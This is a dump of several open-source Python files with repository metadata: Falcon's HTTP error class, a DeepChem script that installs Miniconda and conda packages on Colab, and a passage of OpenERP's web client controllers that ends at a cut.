binarybottle/mindboggle_sidelined
|
load_gene_data.py
|
Python
|
apache-2.0
| 1,078
|
[
"VTK"
] |
2ee5212d6bc70ef9f6305afc8e0e738240b7b0e8c33981fe459200ab55489a1a
|
# Copyright 2013 by Rackspace Hosting, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import xml.etree.ElementTree as et
try: # pragma nocover
from collections import OrderedDict
except ImportError: # pragma nocover
OrderedDict = dict
from falcon.util import uri
class HTTPError(Exception):
"""Represents a generic HTTP error.
Raise this or a child class to have Falcon automagically return pretty
error responses (with an appropriate HTTP status code) to the client
when something goes wrong.
Attributes:
status (str): HTTP status line, e.g. '748 Confounded by Ponies'.
has_representation (bool): Read-only property that determines
whether error details will be serialized when composing
the HTTP response. In ``HTTPError`` this property always
returns ``True``, but child classes may override it
in order to return ``False`` when an empty HTTP body is desired.
See also the ``falcon.http_error.NoRepresentation`` mixin.
title (str): Error title to send to the client. Will be ``None`` if
the error should result in an HTTP response with an empty body.
description (str): Description of the error to send to the client.
headers (dict): Extra headers to add to the response.
link (str): An href that the client can provide to the user for
getting help.
code (int): An internal application code that a user can reference when
requesting support for the error.
Args:
status (str): HTTP status code and text, such as "400 Bad Request"
Keyword Args:
title (str): Human-friendly error title (default ``None``).
description (str): Human-friendly description of the error, along with
a helpful suggestion or two (default ``None``).
headers (dict or list): A ``dict`` of header names and values
to set, or a ``list`` of (*name*, *value*) tuples. Both *name* and
*value* must be of type ``str`` or ``StringType``, and only
character values 0x00 through 0xFF may be used on platforms that
use wide characters.
Note:
The Content-Type header, if present, will be overridden. If
you wish to return custom error messages, you can create
your own HTTP error class, and install an error handler
to convert it into an appropriate HTTP response for the
client
Note:
Falcon can process a list of ``tuple``s slightly faster
than a ``dict``.
href (str): A URL someone can visit to find out more information
(default ``None``). Unicode characters are percent-encoded.
href_text (str): If href is given, use this as the friendly
title/description for the link (defaults to "Documentation
related to this error").
code (int): An internal code that customers can reference in their
support request or to help them when searching for knowledge
base articles related to this error (default ``None``).
"""
__slots__ = (
'status',
'title',
'description',
'headers',
'link',
'code',
)
def __init__(self, status, title=None, description=None, headers=None,
href=None, href_text=None, code=None):
self.status = status
self.title = title
self.description = description
self.headers = headers
self.code = code
if href:
link = self.link = OrderedDict()
link['text'] = (href_text or 'Documentation related to this error')
link['href'] = uri.encode(href)
link['rel'] = 'help'
else:
self.link = None
@property
def has_representation(self):
return True
def to_dict(self, obj_type=dict):
"""Returns a basic dictionary representing the error.
This method can be useful when serializing the error to hash-like
media types, such as YAML, JSON, and MessagePack.
Args:
obj_type: A dict-like type that will be used to store the
error information (default ``dict``).
Returns:
A dictionary populated with the error's title, description, etc.
"""
assert self.has_representation
obj = obj_type()
if self.title is not None:
obj['title'] = self.title
if self.description is not None:
obj['description'] = self.description
if self.code is not None:
obj['code'] = self.code
if self.link is not None:
obj['link'] = self.link
return obj
def to_json(self):
"""Returns a pretty-printed JSON representation of the error.
Returns:
A JSON document for the error.
"""
obj = self.to_dict(OrderedDict)
return json.dumps(obj, indent=4, separators=(',', ': '),
ensure_ascii=False)
def to_xml(self):
"""Returns an XML-encoded representation of the error.
Returns:
An XML document for the error.
"""
assert self.has_representation
error_element = et.Element('error')
if self.title is not None:
et.SubElement(error_element, 'title').text = self.title
if self.description is not None:
et.SubElement(error_element, 'description').text = self.description
if self.code is not None:
et.SubElement(error_element, 'code').text = str(self.code)
if self.link is not None:
link_element = et.SubElement(error_element, 'link')
for key in ('text', 'href', 'rel'):
et.SubElement(link_element, key).text = self.link[key]
return (b'<?xml version="1.0" encoding="UTF-8"?>' +
et.tostring(error_element, encoding='utf-8'))
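# Hedged illustration (values are assumptions):
#     HTTPError('404 Not Found', title='Missing',
#               description='No such resource').to_json()
# produces roughly
#     {
#         "title": "Missing",
#         "description": "No such resource"
#     }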
class NoRepresentation(object):
"""Mixin for ``HTTPError`` child classes that have no representation.
This class can be mixed in when inheriting from ``HTTPError``, in order
to override the `has_representation` property such that it always
returns ``False``. This, in turn, will cause Falcon to return an empty
response body to the client.
You can use this mixin when defining errors that either should not have
a body (as dictated by HTTP standards or common practice), or in the
case that a detailed error response may leak information to an attacker.
Note:
This mixin class must appear before ``HTTPError`` in the base class
list when defining the child; otherwise, it will not override the
`has_representation` property as expected.
"""
@property
def has_representation(self):
return False
class OptionalRepresentation(object):
"""Mixin for ``HTTPError`` child classes that may have a representation.
This class can be mixed in when inheriting from ``HTTPError`` in order
to override the `has_representation` property, such that it will
return ``False`` when the error instance has no description
(i.e., the `description` kwarg was not set).
You can use this mixin when defining errors that do not include
a body in the HTTP response by default, serializing details only when
the web developer provides a description of the error.
Note:
This mixin class must appear before ``HTTPError`` in the base class
list when defining the child; otherwise, it will not override the
`has_representation` property as expected.
"""
@property
def has_representation(self):
return super(OptionalRepresentation, self).description is not None
|
cdepman/falcon_api
|
site-packages/falcon/http_error.py
|
Python
|
mit
| 8,482
|
[
"VisIt"
] |
ffe8363d604bb1c7658e66cb6c9f0a1701a90eec3d3c5c0c9b5b33b50b0ac378
|
"""
Original code by @philopon
https://gist.github.com/philopon/a75a33919d9ae41dbed5bc6a39f5ede2
"""
import sys
import os
import requests
import subprocess
import shutil
from logging import getLogger, StreamHandler, INFO
logger = getLogger(__name__)
logger.addHandler(StreamHandler())
logger.setLevel(INFO)
default_channels = [
"conda-forge",
]
default_packages = [
"openmm",
"pdbfixer",
]
def install(
chunk_size=4096,
file_name="Miniconda3-latest-Linux-x86_64.sh",
url_base="https://repo.continuum.io/miniconda/",
conda_path=os.path.expanduser(os.path.join("~", "miniconda")),
add_python_path=True,
# default channel is "conda-forge"
additional_channels=[],
# default packages are "openmm" and "pdbfixer"
additional_packages=[],
):
"""Install conda packages on Google Colab
For GPU/CPU notebook
```
import conda_installer
conda_installer.install()
```
If you want to add other packages, you can use the additional_channels and
additional_packages arguments. Please see the examples.
```
import conda_installer
conda_installer.install(
additional_channels=[],
additional_packages=["mdtraj", "networkx"]
)
# add a channel
import conda_installer
conda_installer.install(
additional_channels=["dglteam"],
additional_packages=["dgl-cuda10.1"]
)
```
"""
python_path = os.path.join(
conda_path,
"lib",
"python{0}.{1}".format(*sys.version_info),
"site-packages",
)
if add_python_path and python_path not in sys.path:
logger.info("add {} to PYTHONPATH".format(python_path))
sys.path.append(python_path)
is_installed = []
packages = list(set(default_packages + additional_packages))
for package in packages:
package = "simtk" if package == "openmm" else package
is_installed.append(os.path.isdir(os.path.join(python_path, package)))
if all(is_installed):
logger.info("all packages are already installed")
return
url = url_base + file_name
python_version = "{0}.{1}.{2}".format(*sys.version_info)
logger.info("python version: {}".format(python_version))
if os.path.isdir(conda_path):
logger.warning("remove current miniconda")
shutil.rmtree(conda_path)
elif os.path.isfile(conda_path):
logger.warning("remove {}".format(conda_path))
os.remove(conda_path)
logger.info('fetching installer from {}'.format(url))
res = requests.get(url, stream=True)
res.raise_for_status()
with open(file_name, 'wb') as f:
for chunk in res.iter_content(chunk_size):
f.write(chunk)
logger.info('done')
logger.info('installing miniconda to {}'.format(conda_path))
subprocess.check_call(["bash", file_name, "-b", "-p", conda_path])
logger.info('done')
logger.info("installing openmm, pdbfixer")
channels = list(set(default_channels + additional_channels))
for channel in channels:
subprocess.check_call([
os.path.join(conda_path, "bin", "conda"), "config", "--append",
"channels", channel
])
logger.info("added {} to channels".format(channel))
subprocess.check_call([
os.path.join(conda_path, "bin", "conda"),
"install",
"--yes",
"python=={}".format(python_version),
*packages,
])
logger.info("done")
logger.info("conda packages installation finished!")
if __name__ == "__main__":
install()
|
deepchem/deepchem
|
scripts/colab_install.py
|
Python
|
mit
| 3,457
|
[
"MDTraj",
"OpenMM",
"RDKit"
] |
020295dee27522d2a868a52b7b97a5f5ea348e250dd05aa0d8459991859749dd
|
# -*- coding: utf-8 -*-
import ast
import base64
import csv
import functools
import glob
import itertools
import jinja2
import logging
import operator
import datetime
import hashlib
import os
import re
import simplejson
import time
import urllib2
import zlib
from xml.etree import ElementTree
from cStringIO import StringIO
import babel.messages.pofile
import werkzeug.utils
import werkzeug.wrappers
try:
import xlwt
except ImportError:
xlwt = None
import openerp
import openerp.modules.registry
from openerp.tools.translate import _
from openerp import http
from openerp.http import request, serialize_exception as _serialize_exception, LazyResponse
_logger = logging.getLogger(__name__)
env = jinja2.Environment(
loader=jinja2.PackageLoader('openerp.addons.web', "views"),
autoescape=True
)
env.filters["json"] = simplejson.dumps
#----------------------------------------------------------
# OpenERP Web helpers
#----------------------------------------------------------
def rjsmin(script):
""" Minify js with a clever regex.
Taken from http://opensource.perlig.de/rjsmin
Apache License, Version 2.0 """
def subber(match):
""" Substitution callback """
groups = match.groups()
return (
groups[0] or
groups[1] or
groups[2] or
groups[3] or
(groups[4] and '\n') or
(groups[5] and ' ') or
(groups[6] and ' ') or
(groups[7] and ' ') or
''
)
result = re.sub(
r'([^\047"/\000-\040]+)|((?:(?:\047[^\047\\\r\n]*(?:\\(?:[^\r\n]|\r?'
r'\n|\r)[^\047\\\r\n]*)*\047)|(?:"[^"\\\r\n]*(?:\\(?:[^\r\n]|\r?\n|'
r'\r)[^"\\\r\n]*)*"))[^\047"/\000-\040]*)|(?:(?<=[(,=:\[!&|?{};\r\n]'
r')(?:[\000-\011\013\014\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/'
r'))*((?:/(?![\r\n/*])[^/\\\[\r\n]*(?:(?:\\[^\r\n]|(?:\[[^\\\]\r\n]*'
r'(?:\\[^\r\n][^\\\]\r\n]*)*\]))[^/\\\[\r\n]*)*/)[^\047"/\000-\040]*'
r'))|(?:(?<=[\000-#%-,./:-@\[-^`{-~-]return)(?:[\000-\011\013\014\01'
r'6-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/))*((?:/(?![\r\n/*])[^/'
r'\\\[\r\n]*(?:(?:\\[^\r\n]|(?:\[[^\\\]\r\n]*(?:\\[^\r\n][^\\\]\r\n]'
r'*)*\]))[^/\\\[\r\n]*)*/)[^\047"/\000-\040]*))|(?<=[^\000-!#%&(*,./'
r':-@\[\\^`{|~])(?:[\000-\011\013\014\016-\040]|(?:/\*[^*]*\*+(?:[^/'
r'*][^*]*\*+)*/))*(?:((?:(?://[^\r\n]*)?[\r\n]))(?:[\000-\011\013\01'
r'4\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/))*)+(?=[^\000-\040"#'
r'%-\047)*,./:-@\\-^`|-~])|(?<=[^\000-#%-,./:-@\[-^`{-~-])((?:[\000-'
r'\011\013\014\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/)))+(?=[^'
r'\000-#%-,./:-@\[-^`{-~-])|(?<=\+)((?:[\000-\011\013\014\016-\040]|'
r'(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/)))+(?=\+)|(?<=-)((?:[\000-\011\0'
r'13\014\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/)))+(?=-)|(?:[\0'
r'00-\011\013\014\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/))+|(?:'
r'(?:(?://[^\r\n]*)?[\r\n])(?:[\000-\011\013\014\016-\040]|(?:/\*[^*'
r']*\*+(?:[^/*][^*]*\*+)*/))*)+', subber, '\n%s\n' % script
).strip()
return result
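# Hedged example:
#     rjsmin('var x = 1; // comment\nvar y  =  2;')
# returns roughly 'var x=1;\nvar y=2;' -- comments and redundant whitespace
# removed, newlines between statements kept.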
db_list = http.db_list
db_monodb = http.db_monodb
def serialize_exception(f):
@functools.wraps(f)
def wrap(*args, **kwargs):
try:
return f(*args, **kwargs)
except Exception, e:
_logger.exception("An exception occured during an http request")
se = _serialize_exception(e)
error = {
'code': 200,
'message': "OpenERP Server Error",
'data': se
}
return werkzeug.exceptions.InternalServerError(simplejson.dumps(error))
return wrap
def redirect_with_hash(*args, **kw):
"""
.. deprecated:: 8.0
Use the ``http.redirect_with_hash()`` function instead.
"""
return http.redirect_with_hash(*args, **kw)
def ensure_db(redirect='/web/database/selector'):
# This helper should be used in web client auth="none" routes
# if those routes need a db to work with.
# If the heuristic does not find any database, then the user will be
# redirected to db selector or any url specified by `redirect` argument.
# If the db is taken out of a query parameter, it will be checked against
# `http.db_filter()` in order to ensure it's legit and thus avoid db
# forging that could lead to XSS attacks.
db = request.params.get('db')
# Ensure db is legit
if db and db not in http.db_filter([db]):
db = None
# if db not provided, use the session one
if not db:
db = request.session.db
# if no database provided and no database in session, use monodb
if not db:
db = db_monodb(request.httprequest)
# if no db can be found by this point, send to the database selector
# the database selector will redirect to database manager if needed
if not db:
werkzeug.exceptions.abort(werkzeug.utils.redirect(redirect, 303))
# always switch the session to the computed db
if db != request.session.db:
request.session.logout()
request.session.db = db
def module_topological_sort(modules):
""" Return a list of module names sorted so that their dependencies of the
modules are listed before the module itself
modules is a dict of {module_name: dependencies}
:param modules: modules to sort
:type modules: dict
:returns: list(str)
"""
dependencies = set(itertools.chain.from_iterable(modules.itervalues()))
# incoming edge: dependency on other module (if a depends on b, a has an
# incoming edge from b, aka there's an edge from b to a)
# outgoing edge: other module depending on this one
# [Tarjan 1976], http://en.wikipedia.org/wiki/Topological_sorting#Algorithms
#L ← Empty list that will contain the sorted nodes
L = []
#S ← Set of all nodes with no outgoing edges (modules on which no other
# module depends)
S = set(module for module in modules if module not in dependencies)
visited = set()
#function visit(node n)
def visit(n):
#if n has not been visited yet then
if n not in visited:
#mark n as visited
visited.add(n)
#change: n not web module, can not be resolved, ignore
if n not in modules: return
#for each node m with an edge from m to n do (dependencies of n)
for m in modules[n]:
#visit(m)
visit(m)
#add n to L
L.append(n)
#for each node n in S do
for n in S:
#visit(n)
visit(n)
return L
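# Hedged example with a toy graph (module names are illustrative):
#     module_topological_sort({'a': ['b'], 'b': ['c'], 'c': []})
# returns ['c', 'b', 'a']: dependencies come before their dependents.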
def module_installed():
# Candidate modules: the current heuristic is the /static dir
loadable = http.addons_manifest.keys()
modules = {}
# Retrieve database installed modules
# TODO The following code should move to ir.module.module.list_installed_modules()
Modules = request.session.model('ir.module.module')
domain = [('state','=','installed'), ('name','in', loadable)]
for module in Modules.search_read(domain, ['name', 'dependencies_id']):
modules[module['name']] = []
deps = module.get('dependencies_id')
if deps:
deps_read = request.session.model('ir.module.module.dependency').read(deps, ['name'])
dependencies = [i['name'] for i in deps_read]
modules[module['name']] = dependencies
sorted_modules = module_topological_sort(modules)
return sorted_modules
def module_installed_bypass_session(dbname):
loadable = http.addons_manifest.keys()
modules = {}
try:
registry = openerp.modules.registry.RegistryManager.get(dbname)
with registry.cursor() as cr:
m = registry.get('ir.module.module')
# TODO The following code should move to ir.module.module.list_installed_modules()
domain = [('state','=','installed'), ('name','in', loadable)]
ids = m.search(cr, 1, domain)
for module in m.read(cr, 1, ids, ['name', 'dependencies_id']):
modules[module['name']] = []
deps = module.get('dependencies_id')
if deps:
deps_read = registry.get('ir.module.module.dependency').read(cr, 1, deps, ['name'])
dependencies = [i['name'] for i in deps_read]
modules[module['name']] = dependencies
except Exception,e:
pass
sorted_modules = module_topological_sort(modules)
return sorted_modules
def module_boot(db=None):
server_wide_modules = openerp.conf.server_wide_modules or ['web']
serverside = []
dbside = []
for i in server_wide_modules:
if i in http.addons_manifest:
serverside.append(i)
monodb = db or db_monodb()
if monodb:
dbside = module_installed_bypass_session(monodb)
dbside = [i for i in dbside if i not in serverside]
addons = serverside + dbside
return addons
def concat_xml(file_list):
"""Concatenate xml files
:param list(str) file_list: list of files to check
:returns: (concatenation_result, checksum)
:rtype: (str, str)
"""
checksum = hashlib.new('sha1')
if not file_list:
return '', checksum.hexdigest()
root = None
for fname in file_list:
with open(fname, 'rb') as fp:
contents = fp.read()
checksum.update(contents)
fp.seek(0)
xml = ElementTree.parse(fp).getroot()
if root is None:
root = ElementTree.Element(xml.tag)
#elif root.tag != xml.tag:
# raise ValueError("Root tags missmatch: %r != %r" % (root.tag, xml.tag))
for child in xml.getchildren():
root.append(child)
return ElementTree.tostring(root, 'utf-8'), checksum.hexdigest()
def concat_files(file_list, reader=None, intersperse=""):
""" Concatenates contents of all provided files
:param list(str) file_list: list of files to check
:param function reader: reading procedure for each file
:param str intersperse: string to intersperse between file contents
:returns: (concatenation_result, checksum)
:rtype: (str, str)
"""
checksum = hashlib.new('sha1')
if not file_list:
return '', checksum.hexdigest()
if reader is None:
def reader(f):
import codecs
with codecs.open(f, 'rb', "utf-8-sig") as fp:
return fp.read().encode("utf-8")
files_content = []
for fname in file_list:
contents = reader(fname)
checksum.update(contents)
files_content.append(contents)
files_concat = intersperse.join(files_content)
return files_concat, checksum.hexdigest()
concat_js_cache = {}
def concat_js(file_list):
content, checksum = concat_files(file_list, intersperse=';')
if checksum in concat_js_cache:
content = concat_js_cache[checksum]
else:
content = rjsmin(content)
concat_js_cache[checksum] = content
return content, checksum
def fs2web(path):
"""convert FS path into web path"""
return '/'.join(path.split(os.path.sep))
def manifest_glob(extension, addons=None, db=None, include_remotes=False):
if addons is None:
addons = module_boot(db=db)
else:
addons = addons.split(',')
r = []
for addon in addons:
manifest = http.addons_manifest.get(addon, None)
if not manifest:
continue
# ensure it does not end with /
addons_path = os.path.join(manifest['addons_path'], '')[:-1]
globlist = manifest.get(extension, [])
for pattern in globlist:
if pattern.startswith(('http://', 'https://', '//')):
if include_remotes:
r.append((None, pattern))
else:
for path in glob.glob(os.path.normpath(os.path.join(addons_path, addon, pattern))):
r.append((path, fs2web(path[len(addons_path):])))
return r
def manifest_list(extension, mods=None, db=None, debug=False):
""" list ressources to load specifying either:
mods: a comma separated string listing modules
db: a database name (return all installed modules in that database)
"""
files = manifest_glob(extension, addons=mods, db=db, include_remotes=True)
if not debug:
path = '/web/webclient/' + extension
if mods is not None:
path += '?' + werkzeug.url_encode({'mods': mods})
elif db:
path += '?' + werkzeug.url_encode({'db': db})
remotes = [wp for fp, wp in files if fp is None]
return [path] + remotes
return [wp for _fp, wp in files]
def get_last_modified(files):
""" Returns the modification time of the most recently modified
file provided
:param list(str) files: names of files to check
:return: most recent modification time amongst the fileset
:rtype: datetime.datetime
"""
files = list(files)
if files:
return max(datetime.datetime.fromtimestamp(os.path.getmtime(f))
for f in files)
return datetime.datetime(1970, 1, 1)
def make_conditional(response, last_modified=None, etag=None):
""" Makes the provided response conditional based upon the request,
and mandates revalidation from clients
Uses Werkzeug's own :meth:`ETagResponseMixin.make_conditional`, after
setting ``last_modified`` and ``etag`` correctly on the response object
:param response: Werkzeug response
:type response: werkzeug.wrappers.Response
:param datetime.datetime last_modified: last modification date of the response content
:param str etag: some sort of checksum of the content (deep etag)
:return: the response object provided
:rtype: werkzeug.wrappers.Response
"""
response.cache_control.must_revalidate = True
response.cache_control.max_age = 0
if last_modified:
response.last_modified = last_modified
if etag:
response.set_etag(etag)
return response.make_conditional(request.httprequest)
def login_and_redirect(db, login, key, redirect_url='/web'):
request.session.authenticate(db, login, key)
return set_cookie_and_redirect(redirect_url)
def set_cookie_and_redirect(redirect_url):
redirect = werkzeug.utils.redirect(redirect_url, 303)
redirect.autocorrect_location_header = False
return redirect
def load_actions_from_ir_values(key, key2, models, meta):
Values = request.session.model('ir.values')
actions = Values.get(key, key2, models, meta, request.context)
return [(id, name, clean_action(action))
for id, name, action in actions]
def clean_action(action):
action.setdefault('flags', {})
action_type = action.setdefault('type', 'ir.actions.act_window_close')
if action_type == 'ir.actions.act_window':
return fix_view_modes(action)
return action
# I think generate_views and fix_view_modes should go into the JS ActionManager
def generate_views(action):
"""
While the server generates a sequence called "views" computing dependencies
between a bunch of stuff for views coming directly from the database
(the ``ir.actions.act_window model``), it's also possible for e.g. buttons
to return custom view dictionaries generated on the fly.
In that case, there is no ``views`` key available on the action.
Since the web client relies on ``action['views']``, generate it here from
``view_mode`` and ``view_id``.
Currently handles two different cases:
* no view_id, multiple view_mode
* single view_id, single view_mode
:param dict action: action descriptor dictionary to generate a views key for
"""
view_id = action.get('view_id') or False
if isinstance(view_id, (list, tuple)):
view_id = view_id[0]
# providing at least one view mode is a requirement, not an option
view_modes = action['view_mode'].split(',')
if len(view_modes) > 1:
if view_id:
raise ValueError('Non-db action dictionaries should provide '
'either multiple view modes or a single view '
'mode and an optional view id.\n\n Got view '
'modes %r and view id %r for action %r' % (
view_modes, view_id, action))
action['views'] = [(False, mode) for mode in view_modes]
return
action['views'] = [(view_id, view_modes[0])]
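# Illustrative examples (values assumed):
#   {'view_mode': 'tree,form'}            -> 'views' == [(False, 'tree'), (False, 'form')]
#   {'view_mode': 'form', 'view_id': 42}  -> 'views' == [(42, 'form')]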
def fix_view_modes(action):
""" For historical reasons, OpenERP has weird dealings in relation to
view_mode and the view_type attribute (on window actions):
* one of the view modes is ``tree``, which stands for both list views
and tree views
* the choice is made by checking ``view_type``, which is either
``form`` for a list view or ``tree`` for an actual tree view
    This method simply folds the view_type into view_mode by adding a
new view mode ``list`` which is the result of the ``tree`` view_mode
in conjunction with the ``form`` view_type.
TODO: this should go into the doc, some kind of "peculiarities" section
:param dict action: an action descriptor
:returns: nothing, the action is modified in place
"""
if not action.get('views'):
generate_views(action)
if action.pop('view_type', 'form') != 'form':
return action
if 'view_mode' in action:
action['view_mode'] = ','.join(
mode if mode != 'tree' else 'list'
for mode in action['view_mode'].split(','))
action['views'] = [
[id, mode if mode != 'tree' else 'list']
for id, mode in action['views']
]
return action
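# Illustrative example (values assumed): an action with view_type 'form' and
# view_mode 'tree,form' comes out with view_mode 'list,form' and views
# [[False, 'list'], [False, 'form']]; an actual tree view (view_type 'tree')
# is returned unchanged.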
def _local_web_translations(trans_file):
messages = []
try:
with open(trans_file) as t_file:
po = babel.messages.pofile.read_po(t_file)
except Exception:
return
for x in po:
if x.id and x.string and "openerp-web" in x.auto_comments:
messages.append({'id': x.id, 'string': x.string})
return messages
def xml2json_from_elementtree(el, preserve_whitespaces=False):
""" xml2json-direct
Simple and straightforward XML-to-JSON converter in Python
New BSD Licensed
http://code.google.com/p/xml2json-direct/
"""
res = {}
if el.tag[0] == "{":
ns, name = el.tag.rsplit("}", 1)
res["tag"] = name
res["namespace"] = ns[1:]
else:
res["tag"] = el.tag
res["attrs"] = {}
for k, v in el.items():
res["attrs"][k] = v
kids = []
if el.text and (preserve_whitespaces or el.text.strip() != ''):
kids.append(el.text)
for kid in el:
kids.append(xml2json_from_elementtree(kid, preserve_whitespaces))
if kid.tail and (preserve_whitespaces or kid.tail.strip() != ''):
kids.append(kid.tail)
res["children"] = kids
return res
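# For example (illustrative), an element parsed from '<foo a="1">hi</foo>'
# converts to {'tag': 'foo', 'attrs': {'a': '1'}, 'children': ['hi']}.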
def content_disposition(filename):
filename = filename.encode('utf8')
escaped = urllib2.quote(filename)
browser = request.httprequest.user_agent.browser
version = int((request.httprequest.user_agent.version or '0').split('.')[0])
if browser == 'msie' and version < 9:
return "attachment; filename=%s" % escaped
elif browser == 'safari':
return "attachment; filename=%s" % filename
else:
return "attachment; filename*=UTF-8''%s" % escaped
#----------------------------------------------------------
# OpenERP Web web Controllers
#----------------------------------------------------------
# TODO: to remove once the database manager has been migrated server side
# and `edi` + `pos` addons has been adapted to use render_bootstrap_template()
html_template = """<!DOCTYPE html>
<html style="height: 100%%">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>OpenERP</title>
<link rel="shortcut icon" href="/web/static/src/img/favicon.ico" type="image/x-icon"/>
<link rel="stylesheet" href="/web/static/src/css/full.css" />
%(css)s
%(js)s
<script type="text/javascript">
$(function() {
var s = new openerp.init(%(modules)s);
%(init)s
});
</script>
</head>
<body>
<!--[if lte IE 8]>
<script src="//ajax.googleapis.com/ajax/libs/chrome-frame/1/CFInstall.min.js"></script>
<script>CFInstall.check({mode: "overlay"});</script>
<![endif]-->
</body>
</html>
"""
def render_bootstrap_template(db, template, values=None, debug=False, lazy=False, **kw):
if request and request.debug:
debug = True
if values is None:
values = {}
values.update(kw)
values['debug'] = debug
values['current_db'] = db
try:
values['databases'] = http.db_list()
except openerp.exceptions.AccessDenied:
values['databases'] = None
for res in ['js', 'css']:
if res not in values:
values[res] = manifest_list(res, db=db, debug=debug)
if 'modules' not in values:
values['modules'] = module_boot(db=db)
values['modules'] = simplejson.dumps(values['modules'])
def callback(template, values):
registry = openerp.modules.registry.RegistryManager.get(db)
with registry.cursor() as cr:
view_obj = registry["ir.ui.view"]
return view_obj.render(cr, openerp.SUPERUSER_ID, template, values)
if lazy:
return LazyResponse(callback, template=template, values=values)
else:
return callback(template, values)
class Home(http.Controller):
@http.route('/', type='http', auth="none")
def index(self, s_action=None, db=None, **kw):
return http.local_redirect('/web', query=request.params)
@http.route('/web', type='http', auth="none")
def web_client(self, s_action=None, **kw):
ensure_db()
if request.session.uid:
html = render_bootstrap_template(request.session.db, "web.webclient_bootstrap")
return request.make_response(html, {'Cache-Control': 'no-cache', 'Content-Type': 'text/html; charset=utf-8'})
else:
return http.local_redirect('/web/login', query=request.params)
@http.route('/web/login', type='http', auth="none")
def web_login(self, redirect=None, **kw):
ensure_db()
values = request.params.copy()
if not redirect:
redirect = '/web?' + request.httprequest.query_string
values['redirect'] = redirect
if request.httprequest.method == 'POST':
uid = request.session.authenticate(request.session.db, request.params['login'], request.params['password'])
if uid is not False:
return http.redirect_with_hash(redirect)
values['error'] = "Wrong login/password"
return render_bootstrap_template(request.session.db, 'web.login', values, lazy=True)
@http.route('/login', type='http', auth="none")
def login(self, db, login, key, redirect="/web", **kw):
return login_and_redirect(db, login, key, redirect_url=redirect)
class WebClient(http.Controller):
@http.route('/web/webclient/csslist', type='json', auth="none")
def csslist(self, mods=None):
return manifest_list('css', mods=mods)
@http.route('/web/webclient/jslist', type='json', auth="none")
def jslist(self, mods=None):
return manifest_list('js', mods=mods)
@http.route('/web/webclient/qweblist', type='json', auth="none")
def qweblist(self, mods=None):
return manifest_list('qweb', mods=mods)
@http.route('/web/webclient/css', type='http', auth="none")
def css(self, mods=None, db=None):
files = list(manifest_glob('css', addons=mods, db=db))
last_modified = get_last_modified(f[0] for f in files)
if request.httprequest.if_modified_since and request.httprequest.if_modified_since >= last_modified:
return werkzeug.wrappers.Response(status=304)
file_map = dict(files)
rx_import = re.compile(r"""@import\s+('|")(?!'|"|/|https?://)""", re.U)
rx_url = re.compile(r"""url\s*\(\s*('|"|)(?!'|"|/|https?://|data:)""", re.U)
def reader(f):
"""read the a css file and absolutify all relative uris"""
with open(f, 'rb') as fp:
data = fp.read().decode('utf-8')
path = file_map[f]
web_dir = os.path.dirname(path)
data = re.sub(
rx_import,
r"""@import \1%s/""" % (web_dir,),
data,
)
data = re.sub(
rx_url,
r"url(\1%s/" % (web_dir,),
data,
)
return data.encode('utf-8')
content, checksum = concat_files((f[0] for f in files), reader)
# move up all @import and @charset rules to the top
matches = []
def push(matchobj):
matches.append(matchobj.group(0))
return ''
content = re.sub(re.compile("(@charset.+;$)", re.M), push, content)
content = re.sub(re.compile("(@import.+;$)", re.M), push, content)
matches.append(content)
content = '\n'.join(matches)
return make_conditional(
request.make_response(content, [('Content-Type', 'text/css')]),
last_modified, checksum)
@http.route('/web/webclient/js', type='http', auth="none")
def js(self, mods=None, db=None):
files = [f[0] for f in manifest_glob('js', addons=mods, db=db)]
last_modified = get_last_modified(files)
if request.httprequest.if_modified_since and request.httprequest.if_modified_since >= last_modified:
return werkzeug.wrappers.Response(status=304)
content, checksum = concat_js(files)
return make_conditional(
request.make_response(content, [('Content-Type', 'application/javascript')]),
last_modified, checksum)
@http.route('/web/webclient/qweb', type='http', auth="none")
def qweb(self, mods=None, db=None):
files = [f[0] for f in manifest_glob('qweb', addons=mods, db=db)]
last_modified = get_last_modified(files)
if request.httprequest.if_modified_since and request.httprequest.if_modified_since >= last_modified:
return werkzeug.wrappers.Response(status=304)
content, checksum = concat_xml(files)
return make_conditional(
request.make_response(content, [('Content-Type', 'text/xml')]),
last_modified, checksum)
@http.route('/web/webclient/bootstrap_translations', type='json', auth="none")
def bootstrap_translations(self, mods):
""" Load local translations from *.po files, as a temporary solution
until we have established a valid session. This is meant only
for translating the login page and db management chrome, using
the browser's language. """
# For performance reasons we only load a single translation, so for
# sub-languages (that should only be partially translated) we load the
# main language PO instead - that should be enough for the login screen.
lang = request.lang.split('_')[0]
translations_per_module = {}
for addon_name in mods:
if http.addons_manifest[addon_name].get('bootstrap'):
addons_path = http.addons_manifest[addon_name]['addons_path']
f_name = os.path.join(addons_path, addon_name, "i18n", lang + ".po")
if not os.path.exists(f_name):
continue
translations_per_module[addon_name] = {'messages': _local_web_translations(f_name)}
return {"modules": translations_per_module,
"lang_parameters": None}
@http.route('/web/webclient/translations', type='json', auth="none")
def translations(self, mods=None, lang=None):
request.disable_db = False
uid = openerp.SUPERUSER_ID
if mods is None:
m = request.registry.get('ir.module.module')
mods = [x['name'] for x in m.search_read(request.cr, uid,
[('state','=','installed')], ['name'])]
if lang is None:
lang = request.context["lang"]
res_lang = request.registry.get('res.lang')
ids = res_lang.search(request.cr, uid, [("code", "=", lang)])
lang_params = None
if ids:
lang_params = res_lang.read(request.cr, uid, ids[0], ["direction", "date_format", "time_format",
"grouping", "decimal_point", "thousands_sep"])
# Regional languages (ll_CC) must inherit/override their parent lang (ll), but this is
# done server-side when the language is loaded, so we only need to load the user's lang.
ir_translation = request.registry.get('ir.translation')
translations_per_module = {}
